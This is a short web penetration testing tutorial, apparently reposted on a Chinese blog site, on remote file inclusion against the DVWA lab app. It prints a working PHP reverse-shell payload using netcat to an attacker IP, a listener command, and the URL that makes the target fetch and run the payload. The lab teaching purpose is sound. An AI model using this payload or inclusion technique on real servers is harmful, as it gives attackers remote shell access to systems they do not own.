Ethical Hacking – Web Penetration Testing(6)

# 前端 2024-05-05 06:21 0 29 来源: 云博客

REMOTE FILE INCLUSION

  • Similar to local file inclusion.
  • But allows an attacker to read ANY file from ANY server.
  • Execute PHP files from other servers on the current server.
  • Store PHP files on other servers as .txt.

Pre-Condition:

Set allow_url_include to On status.

 

 Restart web service

 

 

Create a local php file on /var/www/html.

<?phppassthru("nc -e /bin/sh 10.0.0.13 8080");?>

 

 

Execute the NC command to wait for connection.

nc -vv -l -p 8080

Visit the URL(http://10.0.0.24/dvwa/vulnerabilities/fi/?page=http://10.0.0.13/reverse.txt?) to execute the reverse connection commands.

 

 We connect to the target machine successfully.

 

相关文章

36.VUE — 认识 Webpack 和 安装
36.VUE — 认识 Webpack 和 安装
nginx + http + svn
nginx + http + svn
kubernets kube-proxy的代理 iptables和ipvs
kubernets kube-proxy的代理 iptables和ipvs
基于Docker搭建 Php-fpm + Nginx 环境
基于Docker搭建 Php-fpm + Nginx 环境
.net 5+ 知新:【1】 .Net 5 基本概念和开发环境搭建
.net 5+ 知新:【1】 .Net 5 基本概念和开发环境搭建
Three.js中显示坐标轴、平面、球体、四方体
Three.js中显示坐标轴、平面、球体、四方体